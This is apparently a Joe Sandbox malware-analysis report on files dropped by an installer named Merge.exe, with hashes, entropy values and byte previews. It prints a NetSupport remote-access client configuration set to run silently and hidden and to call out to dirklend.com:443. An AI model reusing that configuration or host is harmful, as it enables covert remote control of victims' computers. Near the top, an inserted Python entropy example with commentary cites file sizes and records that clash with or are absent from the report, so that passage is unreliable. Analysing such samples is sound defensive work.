Preview: ..|...``..W/.Q.rW...................................1012546698.?=<>/! #awi{bLXGETAJ@%~70VTWVXX[Z.Y_^@HCBEqu.xxs}xHONqqsru.rvyysz}|JFYTZPVSbfihjjml.k...............s.............................W.......................$.......................'........................................................................48;:<<?>.%#"$,'&)AE^H^AO=^SRUUWVY.^Z]]W^A@wpruqvqqDJMLNNqp.wutv~yx{........redggihk.hloi....................q..................................................................m................]................|.w.t.c.x.>.A.j.r.l.k.b.}.W.~.n.G0V2"476,8;:.:?>#.#"%.'V)Z+E-K/\Q1S?U0W7Y,[;]y_.A5C1E+G(I-K>M.O:q.s.u.wnyx{z}|..d`cbedgfphkjulon....................................................?.........................................b.................(k"t"gq}ibmk.rpss;50tqbh08.9...1(325.2699.:=<.Fc.ggAACd....O.Jhf.`.ml1anao.d.ji.yzz .%qWHKJULON.usrtVwvy,./E=,....22V?Q\0.S'$.).................................................................B.....

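The "Entropy (8bit)" and "Encrypted" fields in the records above are the quickest way to spot packed or encrypted payloads among dropped files: the 5,374,844-byte "modified" data file sits at 7.9992 bits per byte and is flagged as encrypted, while the XML and text files stay between 4.7 and 5.1. The following is an added example, not code from the Joe Sandbox report or from its tooling. It recomputes the 8-bit Shannon entropy and hashes for the two files above that are small enough to rebuild from their own metadata: the 2-byte "UTF-16, little-endian, no line terminators" file is assumed to be a bare FF FE byte-order mark, and the 53-byte file is rebuilt from its preview with ".." read as CRLF (that gives exactly 53 bytes). The 7.9 cut-off used for "looks encrypted" is an assumption; the report does not state the threshold behind its flag, only that 7.9992 is flagged and the PE files at 6.82 and below are not. The high-entropy blob is constructed as a stand-in for the data file, which cannot be reproduced here.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy_8bit(data):
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0),
    the quantity reported as 'Entropy (8bit)'. Empty input -> 0.0."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


# Assumption: the report does not publish the cut-off behind its 'Encrypted' flag.
# 7.9 separates the flagged 7.9992 data file from the unflagged PE files (<= 6.82).
ENCRYPTED_THRESHOLD = 7.9


def looks_encrypted(data, threshold=ENCRYPTED_THRESHOLD):
    """Packed/encrypted payload heuristic: entropy close to the 8-bit maximum."""
    return shannon_entropy_8bit(data) > threshold


def summarize(data):
    """The subset of the report's per-file fields that can be recomputed offline."""
    return {
        "size": len(data),
        "entropy": shannon_entropy_8bit(data),
        "encrypted": looks_encrypted(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


def pseudo_random_bytes(n, seed=b"entropy-demo"):
    """Deterministic high-entropy filler (SHA-256 chain), constructed as a
    stand-in for the 5,374,844-byte 'modified' data file listed above."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed inputs rebuilt from the metadata above:
# 1) 2 bytes, UTF-16 little-endian, no line terminators: assumed to be a bare BOM.
UTF16_BOM_FILE = b"\xff\xfe"
# 2) 53 bytes, ASCII with CRLF terminators: the preview with '..' read as CRLF.
WMS_EMPTY_DOCUMENT = b'<document WMSNameSpaceVersion="2.0">\r\n\r\n</document>\r\n'
# 3) constructed stand-in for the 7.9992-entropy 'modified' file.
HIGH_ENTROPY_BLOB = pseudo_random_bytes(64 * 1024)

if __name__ == "__main__":
    samples = [("utf16-bom", UTF16_BOM_FILE),
               ("wms-document", WMS_EMPTY_DOCUMENT),
               ("blob", HIGH_ENTROPY_BLOB)]
    for label, blob in samples:
        s = summarize(blob)
        print(f"{label:13} size={s['size']:<6} entropy={s['entropy']:.6f} "
              f"encrypted={s['encrypted']} md5={s['md5']}")
```

Run it and compare the printed entropy and hash lines with the records above: the BOM file comes out at exactly 1.0 bits per byte (two distinct byte values, equally likely) and the 53-byte document at 4.668695, which matches the report to the printed precision. Matching hashes on the rebuilt inputs is the check that the reconstruction is right; a mismatch means the assumed content is wrong, not the entropy code.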
Process: C:\Users\user\Desktop\Merge.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 7058272
Entropy (8bit): 5.8675494163486315
Encrypted: false
SSDEEP: 98304:yvaWYw01QLUbjLgsRSczJhe1qbnu2OmwkTwuZOk1ViKv2:yChvVe1P2OmwYW
MD5: F78F5CC0A0B3AF7AF5485BB47B4809C0
SHA1: 47D2C43F246E204733A09DFAA7E749B0C2860089
SHA-256: 86AE0078776C0411504CF97F4369512013306FCF568CC1DC7A07E180DDE08EDA
SHA-512: 31947C7D9748C079E6FB0A32E4465B3AFF1E10179F8F9DCC0D72E1A0752B205E0C09912B1A853FFB1A9F87E4741B187DB93D9540A7DC05844D01225B44B9BDAA
Malicious: true
Antivirus: ReversingLabs, Detection: 0%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...mz.f..................<..h/.....4-<......@<...@...........................n......^l...@......@...................@@.......?..7...pE...)...........k.`)...p@.(............................`@.......................?......0@.Z....................text.....;.......;................. ..`.itext...@....;..B....;............. ..`.data........@<......"<.............@....bss....`....`=..........................idata...7....?..8...8=.............@....didata.Z....0@......p=.............@....edata.......@@......~=.............@..@.tls....T....P@..........................rdata..]....`@.......=.............@..@.reloc..(....p@.......=.............@..B.rsrc.....)..pE...)..~B.............@..@..............n.......k.............@..@................

Process: C:\Users\user\Desktop\Merge.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 16200536
Entropy (8bit): 6.701432765203893
Encrypted: false
SSDEEP: 196608:8ZiDmuWcyVooR0/8r8tR/1In6kXGej6p5szbxmE+/k7nUetypJ:8ZifWceooR0/W8P1neNCszyk7htyT
MD5: 7BCB496ECA53CCFAC7C6CFB9802C4BB1
SHA1: F4F82664848F5C3ACA0E7C275F238CF9B9449D26
SHA-256: 979A53F54D540C3B8A3D1D8FF9A138912B351D1E5C48E98273A170668883F594
SHA-512: FFDF9EC47B467CA94E5B7F27C77DC68AA0500A8406B4726C1432C4DDBEDBFD576A7938F2A6D2EECA7AF2D49C6C22757E9E9A9DF62AB0DEE5D271135D3C305AF4
Malicious: false
Antivirus: ReversingLabs, Detection: 3%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......e...........!......_..F........_......._....0.........................0............@..........................Pe.J.....d..C....l..H..............X)...pe.\h....................................................d.@.....d..a...................text...<y_......z_................. ..`.itext...D...._..F...~_............. ..`.data........._......._.............@....bss.........`..........................idata...C....d..D....`.............@....didata..a....d..b....`.............@....edata..J....Pe......Ta.............@..@.rdata..E....`e......Va.............@..@.reloc..\h...pe..j...Xa.............@..B.rsrc....H....l..H....h.............@..@.............0......................@..@........................................................

Process: C:\Users\user\Desktop\Merge.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6018560
Entropy (8bit): 6.382128994504564
Encrypted: false
SSDEEP: 49152:hYvd3ZCYxG5Y1iztWwrOWSiCNFg7GXSv5HZXCiIQW9TgxB/cA+lb2XzGRlKR:hA53mIwvFnMiIMRDslK
MD5: 33082BF128B1700BE41BBC0377520ABB
SHA1: B8AA3500D08ED31CDB13313311496E6E706967F3
SHA-256: F5914CF345F20177203E72987ECA4A442DDD50934EB6273AA433C177E9640A41
SHA-512: F513AF6CDC480A4E0963976618FFA95763960311E257478FCB06B0210AB12704E53D5BCCDF1D9331481ACC10B819661C5C36DF62D69610AA206678DA302A5251
Malicious: false
Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: ClipPlusCommunitySetup_ns.msi, Detection: malicious
• Filename: ClipPlusCommunitySetup.msi, Detection: malicious
Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........~.....]...]...].}.\...].}.\S..].}.\...].}.\...]...]...]..H]...].y.\...].y.\...].y.\...].x.\...].x.\D..].x.\...].x.\...].xp]...].x.\...]Rich...]................PE..L....`[...........!......*..\1......E'.......*..............................@\.....................................P|A..'..`.A.<.....Z.......................Z.|k...I@.8....................I@.....HI@.@.............*..............................text.....*.......*................. ..`.rdata........*.......*.............@..@.data.........A.......A.............@..._RDATA........Z......\Z.............@..@.rsrc.........Z......dZ.............@..@.reloc..|k....Z..l...jZ.............@..B................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\Merge.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 21323992
Entropy (8bit): 6.818517428709818
Encrypted: false
SSDEEP: 393216:PGJ1NrRG+kXqalD2yE/KusyPGvVVoFqq5drB0Vr8bff6eT/Mc1ItdlIWONLAA4EB:+J11tOD4sbVD+
MD5: 849C3F4B28EB18B791695D08C407A543
SHA1: 15568664F0914AA6EBC33B3A9430E302F52BDDB6
SHA-256: 6B8E41EA8B38426749E7A41BF7BBDACA1CF083B59B0A512C24C242E74F540227
SHA-512: E19BD0329FC770F8C8DB2C3E674BC7699DA66870903345998CF451A2CE587F5859E74C7AA22ADBC74E0417D81A6B8023A32282BABBD11553D61C55C9A6BF372E
Malicious: false
Antivirus: ReversingLabs, Detection: 8%
Preview: MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.......9-O.}L!.}L!.}L!.64".KL!.64$.L!.64%.SL!.m...zL!.m.%.iL!.m.".cL!.m.$..L!.k.%.cL!..%..O!..$..L!.}L!.FL!.6.%.[M!.5.$.M!.5.%..L!.64 .dL!.}L ..M!.6.(.|L!.6.!.|L!.6...|L!.6.#.|L!.Rich}L!.........................PE..L......g...........!...).....6......VQz.......................................M.....R.E...@..........................^$.d...D_$......................E..2...pH..i.... .8..................... ....... .@............................................text.............................. ..`.rdata..Zoj......pj.................@..@.data....,....$......h$.............@....rsrc................&.............@..@.reloc...i...pH..j....?.............@..B........................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\Merge.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5179840
Entropy (8bit): 6.683891814956787
Encrypted: false
SSDEEP: 49152:3BFjwPBDr3oUt9ulSQftFGuZXhTz6n5wJudOnMrSrDgn+2EmmLnLfKBbD2f5VAmk:3BFOB37tiftHxNz/BMrSrGByVAmYlmS1
MD5: B38C9B2B76254FDF958769DB2B9242A8
SHA1: B6374308A0338AAC7509FC547E07908B98800625
SHA-256: 4DC4B7FCAB02E7C53F69E5EC59EEFF60BE22BC1A7CCC7F0EF9828C9E3090FC91
SHA-512: 40D7BCC8F13A8A5F98843D10A92518E54279ED56CA010DDDF5EFE1A75C49703BC0BCDFA575E856ADC0853CBD03B0ECF1EE0FF245671C0EED555CCC31AB6D2EF9
Malicious: false
Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Trojan.Win32.Agent.3214.8517.exe, Detection: malicious
• Filename: ClipPlusCommunitySetup_ns.msi, Detection: malicious
• Filename: ClipPlusCommunitySetup.msi, Detection: malicious
• Filename: SecuriteInfo.com.W32.AutoIt.TB.gen.Eldorado.23184.1036.exe, Detection: malicious
• Filename: a1RkNY3NwQ.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o..........................7...........sl......sl......sl......am.......vv.............am..G...am......am........r.....am......Rich....................PE..L....3.^...........!......:..X........3.......:..............................PO.......O...@...........................K......K.(....`L...............N..!...pL..... lG......................lG.....@lG.@.............:.|............................text...?.:.......:................. ..`.rdata..2.....:.......:.............@..@.data........K..~....K.............@....rsrc........`L.......L.............@..@.reloc.......pL.......L.............@..B................................................................................................................................................................................................................................................................................

                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2687128
                                                                                                  Entropy (8bit):6.401769930397263
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:0J5LI+2lf2H2WrFrVUScpLeE5ZyjEWOVshv81EHDF6WKpQeJCPhDt/9KtvAj9nLg:2USAsS1EHDF6WKwJBFKtvuE
                                                                                                  MD5:92DDF7FD13FB43EBD9D0008CC7DFD5A8
                                                                                                  SHA1:E1990FD53A885806DB7375DD27D9761C43D68EC7
                                                                                                  SHA-256:3A38F912BF0F93E266AD7D2EC2A54416B10798F3A6C8EB58E393EB96EB0548FD
                                                                                                  SHA-512:C9103849807B6FF987C74FED9B57D703E5CDD8E2341A42D91D09FC477805C11C73CB60F11DDA357E858E535F64DB2E24D3377499B301DC8ACAA7F00E8F3FFC52
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........A0../c../c../c..,b../c.**b../c..(b../cF-,b../cF-+b../cF-*b../c..+b../c..)b../c..*b&./c...b../c...c&./c.*&b@./c.*/b../c.*.c../c...c../c.*-b../cRich../c........................PE..L.....f...........!...(..#..........F!.......#...............................).....A.)...@......................... b'.P...pb'.h.....'...............(..(....'..>...i&.....................@j&.....(i&.@.............#.H............................text...\.#.......#................. ....rdata..h.....#.......#.............@..@.data...(.....'.."...p'.............@....rsrc.........'.......'.............@..@.reloc...>....'..@....'.............@..B........................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5374602
                                                                                                  Entropy (8bit):7.999225783320548
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:98304:3EizXILuNATgrvUxj0W6RaECRe8+LxKNVEJMjbtA5Joe5b/1qzoWlE:3EIXkSrWj01aECbJu5JT5b9
                                                                                                  MD5:9039C30D9218BBDCCD365E3B09134085
                                                                                                  SHA1:E8BA1634C798FE66FF9EC8D7A04A71D75CE15843
                                                                                                  SHA-256:32684BD13BF3DEB98F8604E1F885DBF427C819208B8376DE7F60C49FF78686D5
                                                                                                  SHA-512:01AD5186B2EECAFEC69E95E0974D0FA45FBEE8BC80943EB8DF55389F9225B178F19112F842E48C776C59B7092AD4679CEB619C204BB0F54C2A8C0A8D62A646EC
                                                                                                  Malicious:false
                                                                                                  Preview:.{v....VK,.k..k.#..................................1012546698.?=<>/! #awi{bLXGETAJ@%~70VTWVXX[Z.Y_^@HCBEqu.xxs}xHONqqsru.rvyysz}|JFYTZPVSbfihjjml.k...............s.............................W.......................$.......................'........................................................................48;:<<?>.%#"$,'&)AE^H^AO=^SRUUWVY.^Z]]W^A@wpruqvqqDJMLNNqp.wutv~yx{........redggihk.hloi....................q..................................................................m................]................|.w.t.c.x.>.A.j.r.l.k.b.}.W.~.n.G0V2"476,8;:.:?>#.#"%.'V)Z+E-K/\Q1S?U0W7Y,[;]y_.A5C1E+G(I-K>M.O:q.s.u.wnyx{z}|..d`cbedgfphkjulon....................................................?.........................................b.................(k"t"gq}ibmk.rpss;50tqbh08.9...1(325.2699.:=<.Fc.ggAACd....O.Jhf.`.ml1anao.d.ji.yzz .%qWHKJULON.usrtVwvy,./E=,....22V?Q\0.S'$.).................................................................B.....
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5016910
                                                                                                  Entropy (8bit):7.4514421328563225
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:M/5DCbiskOa2Wm4o7wcWwnqwH4HDgsHbPbn8gU4xH7U+bTb3gGQf+nYqjUp3Oj:MlUkV2Wm4ofWOW3bPbn8YbTsfWnYmU36
                                                                                                  MD5:83C72A36AFAE7542CE660730959C8E2F
                                                                                                  SHA1:318694CBF96D828D284AACE9EA0148BA56D1CCB0
                                                                                                  SHA-256:634D9F12D277E1A2C8E2E20364AE9FE31543F485DDFF08CB6BF07A611B5BD054
                                                                                                  SHA-512:9DDA43FA2323DEAA5DD868A8A8D375B7E8A3B7802735511051A7D0C258949CFDA0243BD143BD3D981D9097816BE716B27205F9B7AEDAEE5919156E2B4BDD84D5
                                                                                                  Malicious:false
                                                                                                  Preview:RIFFF.L.WAVEfmt ........D...........LIST....INFOISFT....Lavf57.83.100.data..L.................................................................................................................................................................................................................................................................................................................(.(............././.'.'.:.:.....'.'.............................................................b.b.o.o.............................................l.l.........,.,.....-.-.....2.2.....%.%.....*.*.".".............................................................?.?.,.,.4.4././.....+.+.#.#.,.,.0.0.1.1.<.<.3.3.........................................................>.>.H.H.=.=.C.C.=.=.L.L.@.@.N.N.?.?.N.N.J.J.V.V.H.H.*.*.........H H @ @ E E H H 9 9 A A @ @ K K 8 8 ; ; ....................................................i.i.............................................=.=.v.v.Z.Z.......................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):89416
                                                                                                  Entropy (8bit):6.460405476979317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ZrOxYZwDgyfoVD/Ksdl0R8rKZEmU2ffE7CdmW1B1jvmhxccp2UvHNORpPePtJPv4:ZrOxDJs/Ksdl0R1dBmhFJERpPyJPvuXR
                                                                                                  MD5:7629AF8099B76F85D37B3802041503EE
                                                                                                  SHA1:F40A5EFCB9DEE679DE22658C6F95C7E9C0F2F0C0
                                                                                                  SHA-256:2CC8EBEA55C06981625397B04575ED0EAAD9BB9F9DC896355C011A62FEBE49B5
                                                                                                  SHA-512:C209714FFDB0B95595583976340F2EB901EB9895F2F420AFC4CA3C12744432E52FBEDFD857B56CB347D4475DF7678BD42D43F221208A108384E1DF5AAF7D19E4
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L....n.R...........!.........j.......S............0.................................4e..............................@*..-...."..P....P..X............D..H....`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):139128
                                                                                                  Entropy (8bit):7.958465073866813
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:/72t5TbcTRQe9Kb/q7J0U2VQLYopjy7qMjzlvo:DY5T4VQ5QmU26LFpjy7rBo
                                                                                                  MD5:8E58FCC0672A66C827C6F90FA4B58538
                                                                                                  SHA1:3E807DFD27259AE7548692A05AF4FE54F8DD32ED
                                                                                                  SHA-256:6E1BF8EA63F9923687709F4E2F0DAC7FF558B2AB923E8C8AA147384746E05B1D
                                                                                                  SHA-512:0E9FAF457A278AD4C5DD171F65C24F6A027696D931A9A2A2EDD4E467DA8B8A9E4AB3B1FD2D758F5744BF84BECE88C046CDA5F7E4204BEAD14D7C36A46702B768
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Fc...........!....0............................................................V....@.............................@...............@...........0...H...........................................................P...P...............................................................@..@.rsrc....0..........................@..@petite..0.......0...................`..`.....................^8,../..........#c....$..1...p......b.f.....a...e..E...#..9&~h!8.l...|...O.#L..H.....9<.0..F6.....!.h..z..Q,rr..!(.g....q`.a'WyXS........a......h.....c.Y......yS.2.......`......,06..N...`..Px....i.....-.}.."..0....&.!.,..m.'.>.',.O;.......VO..%` .G......`....g9..cd.."....I4..w.#..`.W................(.M.......f.....n2..#...X.J50......bg..B..4..D.U......2J.GruMv..).....A'.TE......LSp.....@..5../..F..8...U..fn...._=.....20.V7B.:0.H..UGS1[Xt=.6....c0..(../$..X.&
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):713
                                                                                                  Entropy (8bit):5.524944650124626
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:vqSWqzd+mPZGShR8kkiBlsVTXuZ7+DP981E7GXXfDWQCYnmSux3A1x:vqSWqzEmPZNR8piBlLoG1fXXfD/kA1x
                                                                                                  MD5:91AC08A10B4DB5162E75E05F083D4489
                                                                                                  SHA1:178376B0E05605D6FFD5D5429904953A7A347304
                                                                                                  SHA-256:46CE6627CA33F6EE5EA54247A4431B97381BEBD5C71B6BB23355DABE3D375A8B
                                                                                                  SHA-512:AE9B425829DF720480D2C10D8101E06548BA590318C3E3EA0DDC5B8B6127D606D37AB11E3673B50D409BA2295B05ECD93431A9DD0D05CFA8AAD60F725772003B
                                                                                                  Malicious:false
                                                                                                  Preview:0xb3579d9b....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=dirklend.com:443..gsk=EIHK;N?BBGEM9D<L@ECEFF9H<K..gskmode=0..GSK=EIHK;N?BBGEM9D<L@ECEFF9H<K..GSKX=EIHK;N?BBGEM9D<L@ECEFF9H<K..
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):323912
                                                                                                  Entropy (8bit):6.732880567545257
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:WyspIr8g8imeKk9Fv8TamdF3xuHGAimnx30aaY5nFJl8NjzGrn0J/d3M1OGg:WyspIr8g8i191uzdwHGAimd0bY5FJl85
                                                                                                  MD5:051CDB6AC8E168D178E35489B6DA4C74
                                                                                                  SHA1:38C171457D160F8A6F26BAA668F5C302F6C29CD1
                                                                                                  SHA-256:6562585009F15155EEA9A489E474CEBC4DD2A01A26D846FDD1B93FDC24B0C269
                                                                                                  SHA-512:602AB9999F7164A2D1704F712D8A622D69148EEFE9A380C30BC8B310EADEDF846CE6AE7940317437D5DA59404D141DC2D1E0C3F954CA4AC7AE3497E56FCB4E36
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L...U.T...........!.................Z.......................................P............@......................... ...k....y..x.......@...............H........0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):773968
                                                                                                  Entropy (8bit):6.901559811406837
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:Windows setup INFormation
                                                                                                  Category:dropped
                                                                                                  Size (bytes):328
                                                                                                  Entropy (8bit):4.93007757242403
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                  Malicious:false
                                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:Non-ISO extended-ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6099
                                                                                                  Entropy (8bit):4.585800710725142
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L1DgNnkStXsfpsNXl0o1n49+jJeQScwzTHXllBXl3SXlcwah0SgAh0su9h0kEhhd:h4nt9kgamEvfUsrywp7
                                                                                                  MD5:99F493DCE7FAB330DC47F0CAB8FE6172
                                                                                                  SHA1:16906FB5988303BB462B65FF4ECE23539A12F4B5
                                                                                                  SHA-256:E0ED36C897EAA5352FAB181C20020B60DF4C58986193D6AAF5BF3E3ECDC4C05D
                                                                                                  SHA-512:2C58171C30AEC8AE131A7C32162856FCE551B55F861D0D9FB0E27A91BD7084388DF5860392F80CDBC6DF6E64E97D8BF2CAE587C3D6B7C142CE711AE8E240BB01
                                                                                                  Malicious:false
                                                                                                  Preview:Installdir=..Client=1..Configurator=0..Control=0..ControlDeskIcon=0..Gateway=0..RemoteDeploy=0..Scripting=0..Student=0..TechConsole=0..Tutor=0..ClientIcon=0..ConfigIcon=0..ControlIcon=0..RemoteDeployIcon=0..ScriptingIcon=0..TechConsoleDeskIcon=0..TechConsoleIcon=0..TutorDeskIcon=0..TutorIcon=0..ClientParams=..CLIENT32=..PINServer=0........# This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....# To ensure correct operation please ensure that the above section is not altered in any way except to change the values ..# for the parameters. The parameter names are case sensitive. ....# Installdir=<driveletter:path>..# e.g. ..# Installdir=e:\my dir1\my dir2\..#..# Determines the drive and directory where the product will be installed. ..# No quotes are required, normal Windows directory naming restrictions apply.....# Client=<1/0>..# e.g...# Client=1..# Controls whether the cli
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):261
                                                                                                  Entropy (8bit):5.12285059281769
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:O/oPeU4xRPjwxVp8WdDKHMoEEjLgpW2M+xrXrIXZNWYpPM/ioM4La8l6i7s:XGpR7wxX8W8JjjqW2MAXWNBPM/iom8lM
                                                                                                  MD5:886E4BB84E1ECC4A04AE599D76FCCE1D
                                                                                                  SHA1:3F0493BB2088AF50BCC8223462DB0B207354E946
                                                                                                  SHA-256:5EEB014E3B390E0C85CE72988D422DCD9DE1520566B11755C70BDD9BB7376060
